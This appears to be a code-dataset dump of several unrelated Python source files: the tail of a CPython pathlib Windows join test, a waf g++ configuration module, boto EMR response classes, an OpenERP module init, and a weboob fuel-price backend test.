class LexicalWindowsPathJoinTest(JoinTestBase, unittest.TestCase):
cls = LexicalWindowsPath
if not is_pypi:
from pathlib import PureWindowsPath, WindowsPath
class PureWindowsPathJoinTest(JoinTestBase, unittest.TestCase):
cls = PureWindowsPath
if os.name == 'nt':
class WindowsPathJoinTest(JoinTestBase, unittest.TestCase):
cls = WindowsPath
if __name__ == "__main__":
unittest.main()
|
python
|
github
|
https://github.com/python/cpython
|
Lib/test/test_pathlib/test_join_windows.py
|
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,sys
from waflib import Configure,Options,Utils
from waflib.Tools import ccroot,ar
from waflib.Configure import conf
@conf
def find_gxx(conf):
cxx=conf.find_program(['g++','c++'],var='CXX')
cxx=conf.cmd_to_list(cxx)
conf.get_cc_version(cxx,gcc=True)
conf.env.CXX_NAME='gcc'
conf.env.CXX=cxx
@conf
def gxx_common_flags(conf):
v=conf.env
v['CXX_SRC_F']=[]
v['CXX_TGT_F']=['-c','-o']
if not v['LINK_CXX']:v['LINK_CXX']=v['CXX']
v['CXXLNK_SRC_F']=[]
v['CXXLNK_TGT_F']=['-o']
v['CPPPATH_ST']='-I%s'
v['DEFINES_ST']='-D%s'
v['LIB_ST']='-l%s'
v['LIBPATH_ST']='-L%s'
v['STLIB_ST']='-l%s'
v['STLIBPATH_ST']='-L%s'
v['RPATH_ST']='-Wl,-rpath,%s'
v['SONAME_ST']='-Wl,-h,%s'
v['SHLIB_MARKER']='-Wl,-Bdynamic'
v['STLIB_MARKER']='-Wl,-Bstatic'
v['cxxprogram_PATTERN']='%s'
v['CXXFLAGS_cxxshlib']=['-fPIC']
v['LINKFLAGS_cxxshlib']=['-shared']
v['cxxshlib_PATTERN']='lib%s.so'
v['LINKFLAGS_cxxstlib']=['-Wl,-Bstatic']
v['cxxstlib_PATTERN']='lib%s.a'
v['LINKFLAGS_MACBUNDLE']=['-bundle','-undefined','dynamic_lookup']
v['CXXFLAGS_MACBUNDLE']=['-fPIC']
v['macbundle_PATTERN']='%s.bundle'
@conf
def gxx_modifier_win32(conf):
v=conf.env
v['cxxprogram_PATTERN']='%s.exe'
v['cxxshlib_PATTERN']='%s.dll'
v['implib_PATTERN']='lib%s.dll.a'
v['IMPLIB_ST']='-Wl,--out-implib,%s'
v['CXXFLAGS_cxxshlib']=[]
v.append_value('LINKFLAGS',['-Wl,--enable-auto-import'])
@conf
def gxx_modifier_cygwin(conf):
gxx_modifier_win32(conf)
v=conf.env
v['cxxshlib_PATTERN']='cyg%s.dll'
v.append_value('LINKFLAGS_cxxshlib',['-Wl,--enable-auto-image-base'])
v['CXXFLAGS_cxxshlib']=[]
@conf
def gxx_modifier_darwin(conf):
v=conf.env
v['CXXFLAGS_cxxshlib']=['-fPIC','-compatibility_version','1','-current_version','1']
v['LINKFLAGS_cxxshlib']=['-dynamiclib']
v['cxxshlib_PATTERN']='lib%s.dylib'
v['FRAMEWORKPATH_ST']='-F%s'
v['FRAMEWORK_ST']=['-framework']
v['ARCH_ST']=['-arch']
v['LINKFLAGS_cxxstlib']=[]
v['SHLIB_MARKER']=[]
v['STLIB_MARKER']=[]
v['SONAME_ST']=[]
@conf
def gxx_modifier_aix(conf):
v=conf.env
v['LINKFLAGS_cxxprogram']=['-Wl,-brtl']
v['LINKFLAGS_cxxshlib']=['-shared','-Wl,-brtl,-bexpfull']
v['SHLIB_MARKER']=[]
@conf
def gxx_modifier_hpux(conf):
v=conf.env
v['SHLIB_MARKER']=[]
v['STLIB_MARKER']='-Bstatic'
v['CFLAGS_cxxshlib']=['-fPIC','-DPIC']
v['cxxshlib_PATTERN']='lib%s.sl'
@conf
def gxx_modifier_platform(conf):
gxx_modifier_func=getattr(conf,'gxx_modifier_'+conf.env.DEST_OS,None)
if gxx_modifier_func:
gxx_modifier_func()
def configure(conf):
conf.find_gxx()
conf.find_ar()
conf.gxx_common_flags()
conf.gxx_modifier_platform()
conf.cxx_load_tools()
conf.cxx_add_flags()
conf.link_add_flags()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (c) 2010 Spotify AB
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from boto.emr.emrobject import EmrObject
from boto.resultset import ResultSet
class RunJobFlowResponse(EmrObject):
Fields = set(['JobFlowId'])
class Arg(EmrObject):
def __init__(self, connection=None):
self.value = None
def endElement(self, name, value, connection):
self.value = value
class Step(EmrObject):
Fields = set(['Name',
'ActionOnFailure',
'CreationDateTime',
'StartDateTime',
'EndDateTime',
'LastStateChangeReason',
'State'])
def __init__(self, connection=None):
self.connection = connection
self.args = None
def startElement(self, name, attrs, connection):
if name == 'Args':
self.args = ResultSet([('member', Arg)])
return self.args
class JobFlow(EmrObject):
Fields = set(['CreationDateTime',
'StartDateTime',
'State',
'EndDateTime',
'Id',
'InstanceCount',
'JobFlowId',
'KeepJobAliveWhenNoSteps',
'LogURI',
'MasterPublicDnsName',
'MasterInstanceId',
'Name',
'Placement',
'RequestId',
'Type',
'Value',
'AvailabilityZone',
'SlaveInstanceType',
'MasterInstanceType',
'Ec2KeyName',
'InstanceCount',
'KeepJobFlowAliveWhenNoSteps'])
def __init__(self, connection=None):
self.connection = connection
self.steps = None
def startElement(self, name, attrs, connection):
if name == 'Steps':
self.steps = ResultSet([('member', Step)])
return self.steps
else:
return None
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import project_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
# Copyright(C) 2012 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
class PrixCarburantsTest(BackendTest):
BACKEND = 'prixcarburants'
def test_prixcarburants(self):
products = list(self.backend.search_products('gpl'))
self.assertTrue(len(products) == 1)
prices = list(self.backend.iter_prices(products[0]))
self.backend.fillobj(prices[0])
|
unknown
|
codeparrot/codeparrot-clean
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.